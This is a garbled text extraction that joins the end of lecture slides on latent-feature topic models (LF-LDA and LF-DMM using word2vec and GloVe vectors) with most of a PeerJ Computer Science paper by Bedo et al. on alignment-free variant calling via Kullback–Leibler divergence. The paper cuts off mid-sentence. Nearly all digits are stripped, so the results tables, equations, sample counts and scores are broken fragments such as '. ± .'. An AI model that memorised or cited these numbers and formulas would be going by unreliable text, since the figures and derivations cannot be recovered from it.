n w d + β) Γ(nt,w¬d + β) �� ∏ w∈w cate(w | τt ω>)k w d � / estimating the topic vectors τt • both the lf-lda and lf-dmm associate each topic t with a topic vector τt, which must be learnt from the training corpus • after each gibbs sweep: É the topic variables z identify which topic each word is generated from É the indicator variables s identify which words are generated from the latent feature distributions cate ⇒ we can use a supervised estimation procedure to find τ • we use lbfgs to optimise the l -regularised log-loss (map estimation) lt = − ∑ w∈w k t,w � τt ·ωw − log( ∑ w ′∈w exp(τt ·ωw ′)) � + µ ‖ τt ‖ / outline introduction latent-feature topic models experimental evaluation conclusions and future work / goals of evaluation • a topic model learns document-topic and topic-word distributions: É topic coherence evaluates the topic-word distributions É document clustering and document classification evaluate the document-topic distribution – the latent feature component only directly changes the topic-word distributions, so these are challenging evaluations • do the word vec and glove word vectors behave differently in topic modelling? • we expect that the latent feature component will have the greatest impact on small corpora, so our evaluation focuses on them: dataset # labels # docs words/doc # types n newsgroups , . , n short ≤ words , . , n small docs . , tmn tagmynews , . , tmntitle tmn titles , . , twitter , . , / word vec-dmm on tagmynews titles corpus ( ) topic initdmm iter= iter= iter= iter= iter= iter= iter= iter= japan japan japan japan japan japan japan japan japan nuclear nuclear nuclear nuclear nuclear nuclear nuclear nuclear nuclear u.s. u.s. u.s. u.s. u.s. u.s. plant u.s. u.s. crisis russia crisis plant plant plant u.s. plant plant plant radiation china crisis radiation quake quake quake quake china nuke russia radiation crisis radiation radiation radiation radiation libya iran plant china china crisis earthquake earthquake earthquake radiation crisis radiation russia nuke nuke tsunami tsunami tsunami u.n. china nuke nuke russia china nuke nuke nuke vote libya libya power power tsunami crisis crisis crisis korea plant iran u.n. u.n. earthquake disaster disaster disaster europe u.n. u.n. iran iran disaster plants oil power government mideast power reactor earthquake power power plants oil election pakistan pakistan earthquake reactor reactor oil power japanese deal talks talks libya quake japanese japanese tepco plants • table shows the most probable topical words in topic found by -topic word vec-dmm on the tmn titles corpus • words found by dmm but not by word vec-dmm are underlined • words found by word vec-dmm but not dmm are in bold / word vec-dmm on tagmynews titles corpus ( ) topic topic topic topic initdmm iter= iter= initdmm iter= iter= initdmm iter= iter= initdmm iter= iter= egypt libya libya critic dies star nfl nfl nfl nfl law law china egypt egypt corner star sheen idol draft sports court bill texas u.s. mideast iran office broadway idol draft lockout draft law governor bill mubarak iran mideast video american broadway american players players bill texas governor bin opposition opposition game idol show show coach lockout wisconsin senate senate libya leader protests star lady american film nba football players union union laden u.n. leader lady gaga gaga season player league judge obama obama france protests syria gaga show tour sheen sheen n.f.l. governor wisconsin budget bahrain syria u.n. show news cbs n.f.l. league player union budget wisconsin air tunisia tunisia weekend critic hollywood back n.f.l. baseball house state immigration report protesters chief sheen film mtv top coaches court texas immigration state rights chief protesters box hollywood lady star football coaches lockout arizona vote court asia mubarak park fame wins charlie judge nflpa budget california washington u.n. russia crackdown takes actor charlie players nflpa basketball peru vote arizona war arab bahrain man movie stars men court game senate federal california • table shows most probable topical words in several topics found by -topic word vec-dmm on the tmn titles corpus • words found by dmm but not by w v-dmm are underlined • words found by w v-dmm but not dmm are in bold / topic coherence evaluation • lau et al. ( ) showed that human scores on a word intrusion task are highly correlated with the normalised pointwise mutual information (npmi) against a large external corpus (we used english wikipedia) • we found latent feature vectors produced a significant improvement of npmi scores on all models and corpora É greatest improvement when λ = (unsurprisingly) npmi scores on the n short dataset with topics, as the mixture weight λ varies from to / topic coherence on twitter corpus data method λ = . t= t= t= t= lda - . ± . - . ± . - . ± . - . ± . twitter w v-lda - . ± . - . ± . - . ± . - . ± . glove-lda - . ± . - . ± . - . ± . - . ± . improve. . . . . dmm - . ± . - . ± . - . ± . - . ± . twitter w v-dmm - . ± . - . ± . - . ± . - . ± . glove-dmm - . ± . - . ± . - . ± . - . ± . improve. . . . . • the normalised pointwise mutual information score improves for both lda and dmm on the twitter corpus, across a wide range of number of topics / document clustering evaluation • cluster documents by assigning them to the highest probability topic • evaluate clusterings by purity and normalised mutual information (nmi) (manning et al., ) evaluation of -topic lda on the n short corpus, as mixture weight λ varies from to • in general, best results with λ = . ⇒ set λ = . in all further experiments / document clustering of twitter data data method purity nmi t= t= t= t= t= t= t= t= lda . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . twitter w v-lda . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . improve. . . . . . . . . dmm . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . twitter w v-dmm . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . glove-dmm . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . improve. . . . . . . . . • on the short, small twitter dataset our models obtain better clustering results than the baseline models with small t. É with t = we obtain . % purity and . % nmi improvements • for small t ≤ , on the large datasets of n , tmn and tmntitle, our models and baseline models obtain similar clustering results. • with larger t our models perform better than baselines on the short tmn and tmntitle datasets • on the n dataset, the baseline lda model obtains better clustering results than ours • no reliable difference between word vec and glove vectors / document classification of n and n short corpora • train a svm to predict document label based on topic(s) assigned to document data model λ = . t= t= t= t= lda . ± . . ± . . ± . . ± . n w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . - . . lda . ± . . ± . . ± . . ± . n small w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . . . • f scores (mean and standard deviation) for n and n small corpora / document classification of tmn and tmn title corpora data model λ = . t= t= t= t= lda . ± . . ± . . ± . . ± . tmn w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . . . dmm . ± . . ± . . ± . . ± . tmn w v-dmm . ± . . ± . . ± . . ± . glove-dmm . ± . . ± . . ± . . ± . improve. . . . . lda . ± . . ± . . ± . . ± . tmntitle w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . . . dmm . ± . . ± . . ± . . ± . tmntitle w v-dmm . ± . . ± . . ± . . ± . glove-dmm . ± . . ± . . ± . . ± . improve. . . . . / document classification of twitter corpus data method λ = . t= t= t= t= lda . ± . . ± . . ± . . ± . twitter w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . . . dmm . ± . . ± . . ± . . ± . twitter w v-dmm . ± . . ± . . ± . . ± . glove-dmm . ± . . ± . . ± . . ± . improve. . . . . • for document classification the latent feature models generally perform better than the baseline models É on the small n small and twitter datasets, when the number of topics t is equal to number of ground truth labels (i.e. and correspondingly) our w v-lda model obtains +% higher f score than the lda model É our w v-dmm model achieves . % and . % higher f score than the dmm model on the tmn and tmntitle datasets with t = , respectively. / outline introduction latent-feature topic models experimental evaluation conclusions and future work / conclusions • latent feature vectors induced from large external corpora can be used to improve topic modelling É latent features significantly improve topic coherence across a range of corpora with both the lda and dmm models É document clustering and document classification also significantly improve, even though these depend directly only on the document-topic distribution • the improvements were greatest for small document collections and/or for short documents É with enough training data there is sufficient information in the corpus to accurately estimate topic-word distributions É the improvement in the topic-word distributions also improves the document-topic distribution • we did not detect any reliable difference between word vec and glove vectors / future directions • retrain the word vectors to fit the training corpus É how do we avoid losing information from external corpus? • more sophisticated latent-feature models of topic-word distributions • more efficient training procedures (e.g., using sgd) • extend this approach to a richer class of topic models / introduction latent-feature topic models experimental evaluation conclusions and future work submitted december accepted may published july corresponding author justin bedo, cu@cua .org academic editor mireille regnier additional information and declarations can be found on page doi . /peerj-cs. copyright bedo et al. distributed under creative commons cc-by . open access information theoretic alignment free variant calling justin bedo , , benjamin goudey , , jeremy wazny and zeyu zhou , ibm research—australia, carlton, vic, australia department of computing and information systems, the university of melbourne, parkville, vic, australia centre for epidemiology and biostatistics, the university of melbourne, parkville, vic, australia school of mathematics and statistics, the university of melbourne, parkville, vic, australia abstract while traditional methods for calling variants across whole genome sequence data rely on alignment to an appropriate reference sequence, alternative techniques are needed when a suitable reference does not exist. we present a novel alignment and assembly free variant calling method based on information theoretic principles designed to detect variants have strong statistical evidence for their ability to segregate samples in a given dataset. our method uses the context surrounding a particular nucleotide to define variants. given a set of reads, we model the probability of observing a given nucleotide conditioned on the surrounding prefix and suffixes of length k as a multinomial distribution. we then estimate which of these contexts are stable intra-sample and varying inter-sample using a statistic based on the kullback–leibler divergence. the utility of the variant calling method was evaluated through analysis of a pair of bacterial datasets and a mouse dataset. we found that our variants are highly informa- tive for supervised learning tasks with performance similar to standard reference based calls and another reference free method (discosnp++). comparisons against reference based calls showed our method was able to capture very similar population structure on the bacterial dataset. the algorithm’s focus on discriminatory variants makes it suitable for many common analysis tasks for organisms that are too diverse to be mapped back to a single reference sequence. subjects bioinformatics, computational biology keywords alignment free, variant, assembly free, genome, acteria, feature extraction introduction many sequencing studies begin by the transformation of raw sequence data to relatively few features, usually single-nucleotide variants. typically, this is done by aligning the individual sequence reads to a reference genome to identify single nucleotide differences from the reference. although straightforward, the genome alignment approach has several shortcomings: • a suitable reference may not exist; this is especially important for unstable genomes such the anuploid genomes frequently encountered in cancer (beroukhim et al., ), and also for some organisms with large genetic diversity such as bacteria (ochman, lawrence & groisman, ); how to cite this article bedo et al. ( ), information theoretic alignment free variant calling. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:cu@cua .org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. • selecting a reference may be difficult when there is uncertainty about what has been sampled; and • it performs poorly when a sample contains significant novel material, i.e., sequences that are not simple variations of the reference. existing reference-free approaches are either based on assembly (li, ), which possibly introduces misassembly biases, or on searching for structural motifs within a universal de bruijn graph of all samples (peterlongo et al., ; iqbal et al., ; uricaru et al., ) that correspond to simple variants. we present a variant calling algorithm to generate features from unaligned raw reads. rather than attempting to identify all genetic variation within a given set of samples, we instead focus on selected variants that have have strong statistical evidence for their ability to segregate samples in a given dataset. such variants form useful features for many tasks including genomic prediction of a given phenotype, modelling population structure or clustering samples into related groups. our method uses the context surrounding a particular nucleotide to define variants. given a set of reads, we model the probability of observing a given nucleotide conditioned on the surrounding prefix and suffix nucleotide sequences of length k as a multinomial distribution. we then estimate which of these contexts form potential variants, i.e., those that are stable intra-sample and varying inter-sample, using a statistic based on the kullback–leibler divergence. given this list of candidate variants, we call those variants by maximum likelihood of our multinomial model. furthermore, we show that the size of the context k can be chosen using the minimum message length principle (wallace & boulton, ) and that our context selection statistic is γ-distributed. consequently, k can be determined from the data and the contexts surrounding variants can be selected with statistical guarantees on type- errors. the utility of variant calling method was evaluated through simulation experiments and empirical analysis of a pair of bacterial datasets and a mouse dataset. through simulations we showed the method has good power and false positive rate for detecting variants, though the ability to detect rare variants required high depth and large number of samples. our empirical results indicated our variants are highly informative for antimicrobial resistance phenotypes on the bacterial datasets and were able to accurately capture population structure. on the mouse dataset, the variants were also found to be good for modelling coat colour. further investigations of the variants found for the bacterial dataset using a known reference sequence revealed variants associated with boxb repeat regions, a repeat previously used for population structure mapping (rakov, ubukata & robinson, ), suggesting the model can generate features for more complex genetic elements. these results suggest the variants are capturing genotypic variation well and can model heritable traits in different organisms. our proposed method will be of strongest utility when modelling of population structure, phylogenetic relationships or phenotypes from genotype for large scale datasets of organisms with either variable genomes (as is the case for many bacteria), or those lacking a reference genome. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. methods our variant calling method comprises two steps: modelling the probability that a base is observed in a sample given the surrounding context; and determining which contexts surround variable bases in a population represented by several samples. the former provides a mechanism to call variants in a sample given a set of contexts, and the latter determines the set of contexts associated with variants. variant calling we consider the case of variant calling directly from a collection of reads. let random variable xij taking values in {a,c,g,t} denote the jth nucleotide of the ith read, with ≤ i≤n and ≤ j≤mi the number of reads and nucleotides in the read i. definition (k-context): the k-context around a nucleotide j consists of a k-prefix sequence πk(xi,j) :=[xi(j−k),xi(j−k+ ),...,xi(j− )] and a k-suffix sequence σk(xi,j) :=[xi(j+ ),xi(j+ ),...,xi(j+k)]. contexts that consist of only the prefix/suffix sequences are suffix/prefix-free. definition (k-context probability): the k-context probability is the probability of observing a base at a particular position given the context, that is p(xij|πk(xi,j),σk(xi,j)). the k-context probabilities can be estimated from the data by maximising a pseudolikelihood. let f (b,πk,σk) := + ∑ ijjxij =b∧πk =πk(xi,j)∧σk =σk(xi,j)k denote the counts of how often b was observed with k-prefix πk and k-suffix σk in the read set x, where j·k is the iverson bracket. here the pseudocount encodes a weak uniform prior. the probability density estimate of observing a base b in context (πk,σk) is then given by p̂(b|πk,σk) := f (b,πk,σk)∑ b′ f (b ′,πk,σk) . the suffix/prefix free densities are thus p̂(b|πk)= ∑ σk p̂(b|πk,σk) and p̂(b|σk)= ∑ πk p̂(b|πk,σk). given a context (πk,σk), the base can be called as argmaxbp̂(b|πk,σk), and similarly for prefix/suffix free densities. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. variant finding determining the list of variants consists of determining which contexts (πk,σk) surround a variable base in our population, then call the base for each variant-defining context and each sample. we consider inter-sample variants and not intra-sample variants; we are interested in finding contexts which define variants that differ amongst samples and are not attributable to noise. in this section, we develop a statistic based on the kullback–leibler (kl) divergence that achieves these two points. let x be a set of samples, each consisting of a collection of reads as defined above. for each x ∈x , we refer to the jth nucleotide of the ith read as xij, the number of reads in the sample as nx, and the number of nucleotides in read xi as mxi. similarly to the previous section, we denote fx(b,πk,σk) as the frequency of observing base b given context (πk,σk) for sample x. as before, a pseudocount is used when estimating fx to encode a uniform prior. the kl divergence measure provides a way of quantifying the differences between two probability distributions. we will develop a statistic based upon the kl-divergence that compares the individual sample distributions of nucleotide occurrence for a given context with a global expected distribution. contexts that significantly diverge from the global expected distribution surround a site which is variant in the population sample. definition (kullback–leibler divergence): let p and q be two discrete probability densities over the domain y . the kullback–leibler (kl) divergence is p(·)‖klq(·) := ∑ y∈y p(y)log p(y) q(y) . definition (total divergence): the total divergence for a given context (πk,σk) is estimated as the total kl divergence between the samples in the dataset x and the expected probability distribution given the context: dx (πk,σk) := ∑ x∈x p̂x(·|πk,σk)‖klq(·|πk,σk), where p̂x(·|πk,σk) := fx(b,πk,σk)∑ b′ fx(b ′,πk,σk) denotes the probability density estimated for sample x and context (πk,σk) and q(b|πk,σk) := ∑ x∈x fx(b,πk,σk)∑ x∈x ,b′ fx(b ′,πk,σk) . the total divergence statistic is proportional to the expected kl-divergence between a sample and the global expected probability distribution. to see why this statistic is robust to noise, consider the case where variation is due purely to noise. as the noise distribution is independent of sample, it will be well modelled by the expected distribution q and bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. therefore the divergence between each sample and q will be small. conversely, if variation is due to samples being drawn from two or more latent probability densities, then q will be an average of these latent densities and divergence will be high. the next theorem is crucial for determining when a particular divergence estimate indicates a significant divergence from the expected distribution q. using this theorem, we can use hypothesis testing to select which contexts are not well explained by q. these contexts not well explained by q are variant and we call them as in ‘variant calling.’ theorem . under random sampling from q, d follows a γ distribution. the proof of this theorem is trivial given a well known result regarding the g-test (see sokal & rohlf ( )). lemma let fx be a frequency function and g :=e[fx]. the g-test is g := ∑ x∈x ∑ b∈{a,t,c,g} fx(b,πk,σk)log ( fx(b,πk,σk) g(b,πk,σk) ) . under the null hypothesis that fx results from random sampling from a distribution with exp- ected frequencies g, g follows a χ distribution with |x |degrees of freedom asymptotically. from this lemma, the proof of theorem follows easily: proof. d is proportional to the g-test. as the g-test isχ -distributed, d isγ-distributed. � clearly our statistic d is very similar to g, but has an important property: d is invariant to coverage. as d operates on estimates of the probability rather than the raw counts, changes in coverage are effectively normalised out. this is advantageous for variant discovery as it avoids coverage bias and allows variants to be called for (proportionally) low-coverage areas, if statistical support for their variability in the population exists. to select contexts, aγ distribution is fitted to the data. for the results in our experiments, we used a bayesian mixture model with a β prior over the mixing weights whereby each context could originate from the null (γ) distribution or from a uniform distribution. the mixing weights were then used to determine if a context is not well supported by the null distribution. such a model comparison procedure has several advantages and directly estimates the probabilities of support by the data for each context (kamary et al., ), providing an easily interpretable quantity. choosing context size the problem of choosing context size k is difficult; if too large then common structures will not be discovered, and if too small then base calling will be unreliable. we propose to choose k using the minimum message length principle (wallace & boulton, ). consider a given sample x. the message length of a two-part code is the length of the compressed message plus the length of the compressor/decompresser. in our case, the length of the compressed message is given by the entropy of our above probability bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. distribution: l(x;p̂(·|πk,σk)) :=− ∑ ij logp̂(xij|πk,σk). the compressor/decompresser is equivalent to transmitting the counts for the probability distribution. this can be thought of as transmitting a k length tuple of counts. let n = ∑ i(mi− k) be the total number of contexts in the read set (i.e., the total number of prefix and suffix pairs in the data). thus, ( n+ k+ − k+ − ) count distributions are possible amongst the number of total prefix and suffix pairs ( k× k = k distinct prefix/suffix pairs, and possible observable bases), giving a total message length of ml(x;p̂(·|πk,σk)) :=l(x;p̂(·|πk,σk))+log ( n + k+ − k+ − ) . approximating the r.h.s using stirling’s approximation and dropping constant terms yields ml ∼ ∝ l(x;p̂(·|πk,σk))+ log( ) ( k−( + k) + k ) + ( ( + k+n ) − ) log ( n + + k ) . for suffix free densities the message length simplifies to ml(x;p̂(·|πk)) :=l(x;p̂(·|πk))+log ( n + k+ − k+ − ) ∼ ∝ l(x;p̂(·|πk))+log( ) ( k− ( +k) +k ) + ( ( +k+n ) − ) log ( n + +k ) , and similarly for prefix free. prefix/suffix free contexts the method we have presented so far has been developed for any contexts defined by any combination of prefix and suffix. the question of whether prefix/suffix-free contexts or full contexts (both prefix and suffix) naturally arises. the decision depends on the type of variants of interest: using full contexts will restrict the variants to single nucleotide variants (snv), while one sided contexts allow for more general types of variants such as insertions and deletions. full contexts also have less power to detect variation caused by close-by snvs; two snvs in close proximity will create several different contexts when modelling with both prefixes and suffixes. it is also worth remarking that the choice between prefix and suffix free contexts is immaterial under the assumption of independent noise and sufficient coverage. thus, our experiments concentrate on suffix-free contexts as it is the more general case. reference-based variant calling to compare the ability of our proposed method to a reference-based approach, we have processed all datasets using a standard mapping-based snp calling pipeline. using bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. samtools v . - , raw reads from each sample were mapped to the relevant reference sequence and sorted. the mapped reads are then further processed to remove duplicates arising from pcr artefacts using picard v . and to realign reads surrounding indels using gatk v . - . pileups are then created across all samples using samtools and snps are called using the consensus-method of bcftools v . - . the resulting snps were then filtered to remove those variants with phred-scaled quality score below , minor allele frequency below . or snps that were called in less than % of samples. results simulation study we first investigate the power and the false positive rate (fpr) of our method by simulations as minor allele frequency (maf), sequencing depth, and sample size are varied. a total of , contexts per sample, of which one was a variant site with two possible alleles across the population, were simulated by sampling counts from a multinomial distribution. this corresponds to a simulating a snp, indel or any other variant whose first base, i.e., the base directly following the context, is bi-allelic. each context was simulated with a sequencing read error of % by sampling from a multinomial distribution, with the total number of simulations per context determined by the specified sequencing depth. variants were determined by fitting a gamma distribution and rejecting at a level of p< . corrected for multiple testing by bonferroni’s method. this procedure is repeated , times for each combination of simulation parameters. figures and shows the results of the simulation. with a depth of our method is able to recover the variant site with high power when the maf is % or higher, even with few samples ( ). the fpr was also well controlled, but reduces sharply with moderate depth (> ) at samples, and is low at most depth for , samples. identification of rare variants at low sample sizes ( % maf at samples) is not reliable, however rare variants are still identifiable with high power at high depth and samples (depth greater than and , samples). empirical experiments we also evaluated our method on three different datasets: two datasets are of streptococcus pneumoniae bacteria, one collected in massachusetts (croucher et al., ) and the other in thailand (chewapreecha et al., a); and one mouse dataset (fairfield et al., ). the two s. pneumoniae datasets comprise and , samples sequenced using illumina sequencing technology. the jax mouse dataset (fairfield et al., ) contains sequenced exomes of inbred mouse lines. all experiments were conducted with suffix-free contexts and only contexts present across all samples were evaluated for variants. our method identified , variants in the massachusetts dataset, , in the thailand dataset, and , in the mouse dataset. we refer to these as kl variants. we also compare our method with a mapping-based snp calling approach on the s. pneumoniae datasets. using sequence for s. pneumoniae atcc (ncbi accession nc_ . ) as a reference, there were , and , snps called for the bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.ncbi.nlm.nih.gov/nucleotide?term=nc_ . http://dx.doi.org/ . /peerj-cs. figure power curves for , simulated contexts with a single variant context for varying depth and sample size (panels). the bi-allelic variant context was simulated , times and curves show the mean of the , simulations. the error for the mean is less than % in all cases. figure false positive rate for , simulated contexts with a single variant context for varying depth and sample size (panels) as described in fig. . the error for the mean is less than % in all cases. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. e+ e+ e+ k m es sa ge le ng th jax strep. (mass.) strep. (th.) figure : message length for prefix-only contexts on two s. pneumoniae samples from the massachusetts and thailand datasets, and the s /svimj mouse line from the jax dataset. the optimal k under the mml framework is k = for the s. pneumoniae massachusetts dataset, k = for the s. pneumoniae thailand dataset, and k = for jax . to evaluate the stability of the message length criterion, the optimal k according to message length was calculated on all samples from the massachusetts data (table ). the majority of samples had an optimal length of k = , with the remainder being optimal at k = . investigation into the singleton sample with minimal length at k = revealed a failed sequencing with only , reads present. we also evaluated all samples present in the jax dataset and found all but one sample had minimal message length at k = . the stability of k is therefore high and we use k = for the two s. pneumoniae datasets and k = for the jax mouse dataset henceforth in all experiments. table : proportion of samples in massachusetts data by optimal k. optimal k count figure message length for prefix-only contexts on two s. pneumoniae samples from the massachusetts and thailand datasets, and the s /svimj mouse line from the jax dataset. the optimal k under the mml framework is k = for the s. pneumoniae massachusetts datasets, k = for the s. pneumoniae thailand dataset, and k= for jax . massachusetts and thailand datasets. to be comparable with the resulting binary snps calls, we transform our multi-allelic variants to binary variants with the major allele being one and other alleles being zero. finally, we compare our results with variants called by another reference-free caller discosnp++ (uricaru et al., ) (v . . ). discosnp++ finds , variants for the massachusetts s. pneumoniae data, and , variants for jax . discosnp++ results are not available on the thailand dataset as the software fails to run in reasonable time on such a large dataset. message lengths our first experiment investigated the optimal k resulting from our message length criterion (see ‘choosing context size’). figure shows the results of various contexts sizes on three samples, one from each of the massachusetts s. pneumoniae, thailand s. pneumoniae and jax mouse data. the s. pneumoniae massachusetts and thailand samples had the shortest message length at k= and k= respectively, and the s /svimj mouse line had the shortest message length at k= . to evaluate the stability of the message length criterion, the optimal k according to message length was calculated on all samples from the massachusetts data (table ). the majority of samples had an optimal length of k = , with the remainder being optimal at k= . investigation into the singleton sample with minimal length at k= revealed a failed sequencing with only , reads present. we also evaluated all samples present in the jax dataset and found all but one samples had minimal message length at k= . the stability of k is therefore high and we use k = for the two s. pneumoniae datasets and k= for the jax mouse dataset henceforth in all experiments. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table count of samples in massachusetts data by optimal k. optimal k count table amr prediction results using kl variants. variants were discovered only on the massachusetts dataset and then called on both massachusetts and thailand datasets. each row indicates what dataset models were trained on and the columns denote the testing dataset. numbers are the area under the re- ceiver operating characteristic (aroc). the aroc was estimated using -fold cross-validation within datasets. the numbers in parentheses are the performance when predicting on standard snp calls (s) de- rived through a traditional alignment pipeline and discosnp++ (d) calls. discosnp++ results are not available on the thailand dataset as the software fails to run in reasonable time on such a large dataset. training dataset massachusetts thailand all massachusetts . (s: . , d: . ) . (s: . ) thailand . (s: . ) . (s: . ) all . supervised learning performance to investigate the robustness of our variants for genomic prediction tasks, we evaluated the ability of variants called on the massachusetts s. pneumoniae dataset for the prediction of benzylpenicillin resistance under different training and testing scenarios across the two s. pneumoniae datasets. each sample was labelled as resistant if the minimum inhibitory concentration exceeded . µg/ml (chewapreecha et al., b). in all tasks, a support vector machine (svm) (schölkopf & smola, ) was used to predict resistance from the variants, and the performance measured using the area under the receiver operating characteristic (aroc). table shows the results of the experiments. each row indicates what dataset models were trained on and the columns denote the testing dataset. for intra-dataset experiments (i.e., the diagonal), aroc was estimated using -fold cross validation. our variants are clearly capturing the various resistance mechanisms, as evident by the strong -fold cross validation predictive performance. in comparison to the traditional pipeline and discosnp++ features (on massachusetts data only) also performed well. given the high level of accuracy, the three methods do not differ significantly in performance. the model trained using our variants on the massachusetts data is moderately predictive on the thailand dataset. conversely, the model from the thailand dataset can also moderately predict resistance in the massachusetts data, but to a lesser degree. one possible explanation for this limited predictive ability is the existence of resistance mechanisms unique to each dataset, hence a model trained on one dataset will not capture unobserved mechanisms and consequently the model is unable to predict resistance arising form these unknown mechanisms. this hypothesis is supported by the strong performance observable on the diagonal: when combining both datasets and preforming cross-validation, the performance is high. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure roc produced from leave-one-out cross-validation performance predicting agouti coat colour from kl variants on jax mouse dataset. aroc is %. we also evaluated our variants for predicting coat colour on the jax mouse dataset (fairfield et al., ). as few samples are available ( labelled samples), we reduced the problem to a -class classification problem, classifying coat colour into agouti or not. this led to a well balanced classification problem with samples in the agouti classes and not. the performance for this task was estimated at % aroc using leave-one-out (loocv) cross-validation, suggesting the variants are also predictive of heritable traits in higher level organisms. fig. shows the roc for this classification problem. population structure finally, we investigate the population structure captured by kl variants and the snp calls on the massachusetts dataset. the population structures were estimated using principle component analysis (pca), a common approach whereby the top principal components derived across all genetic variants reflect underlying population structure rather than the studied phenotype of interest (price et al., ). five sub-populations (clusters) were identified using k-means on the first two principal components from the snp data. projecting those clusters on to the principal component scores of our variants (fig. ) results in highly concordant plots. four out of the five clusters can be easily identified using our variants, indicating the detected variation preserves population structures well. a canonical correlation analysis (cca) was performed to further assess the similarities between the two feature sets (table ). regularisation was used to find the canonical vectors as the cross-covariance matrices are singular for our dataset. as there are significantly more features than samples, regularised cca was used and the correlation between projections estimated using samples of leave-one-out bootstrap (hastie, tibshirani & friedman, bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure first two principal components derived from alignment-based snp calls (a) and from vari- ants detected by our method (b) applied to the massachusetts s. pneumoniae dataset. each point repre- sents a sample and the colours denotes the cluster assignment determined by k-means clustering. the sim- ilar pattern of samples in each plot indicates that the same population structure signal is detected by the two variant detection methods. table correlation coefficients for first cca components, estimated using -fold cross-validation on massachusetts data. component correlation coefficient (± % ci) . ± . . ± . . ± . . ± . . ± . ). we found the first three components explain all the variance ( %), with the first component alone explaining %. therefore, both mapping-based snps and kl variants are largely capturing the same variance on the massachusetts data. analysis of contexts to further elucidate the type of variants that are being discovered by our method, we aligned the significant contexts from the massachusetts dataset to the s. pneumoniae reference. of the contexts, less than % failed to align, % aligned in a single location, and the remainder aligned in two or more locations. one context aligned in different locations in the reference genome. further investigation revealed the context corresponds to a boxb repeat sequence. such repeats have previously been used to identify population structure of s. pneumoniae isolates carrying the f serotype, supporting our population structure findings (rakov, ubukata & robinson, ). this suggests the variants may be tagging more complex structural elements than just single nucleotide variants. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conclusions we presented a novel reference-free variant detection method for next-generation sequence data. our method has the advantage of no tuning parameters, rapid calling of known variants on new samples, and may be suited for targeted genotyping once a known set of variants are obtained. simulation experiments showed the method is relatively robust and has good power and fpr to detect common variants, but for rare variants the power was lower and a high depth and number of samples were required to reliably detect them. in a typical genomic prediction setting the method was able to predict heritable phenotypes on both a bacterial dataset (anti-microbial resistance) and on a mouse dataset (coat-colour). on the s. pneumoniae datasets, our method was shown to have similar performance to a standard alignment-based snp calling pipeline, with its requirements for a suitable reference genome. moreover, the method was shown to capture the same population structure on the massachusetts streptococcus bacterial datasets as an alignment- based variant calling approach. these results show our method is capable of capturing important genomic features without a known reference. as with other reference-free variant calling methods, interpretation of the detected variants is more difficult compared to a mapping-based approach as called variants are reported without positional information. one approach to obtain such annotations is to map the variant and its context back to a given reference. given that most sequences with a length greater than bp that exist in a given bacterial reference will have a unique mapping, many variants could be easily mapped back. however, such information is unlikely to exist for variants that do not occur in the reference, or may be misleading for variants that arise through complicated procedures such as horizontal gene transfer. alternatively, variants and their context could be examined via blast searches to determine whether these sequences correspond to previously identified genes or other genomic features. in our experiments we used a combination of these approaches to investigate some of the variants found on the bacterial dataset. we identified contexts that mapped to numerous locations in the reference genome and then used blast to identify the likely origin of the sequence. through this method, variants associated with boxb repeat sequence were found, suggesting our method is capturing variance associated with complex structures. we envisage that the method proposed here could be used to conduct a rapid initial analysis of a given dataset, such as species identification, outbreak detection or genomic risk prediction. our method also enables analysis of data without a suitable reference while still avoiding the computationally expensive step of assembly. furthermore, our method scales linearly with the total number of reads, allowing application to large datasets. the statistical framework established in this work is quite general and could be expanded in several ways. while we have examined only single nucleotide variants within this work, insertions and deletions could be explicitly modelled within this framework at the cost of increased computational expense. it may also be possible to model other types of variants, such as microsatellites, provided that a suitable representation for them could be found. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements we thank thomas conway and noel faux for helpful discussions. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • justin bedo conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • benjamin goudey performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • jeremy wazny performed the experiments, wrote the paper, reviewed drafts of the paper. • zeyu zhou performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the research in this article did not generate any raw data and all experiments were conducted on publicly available data. the 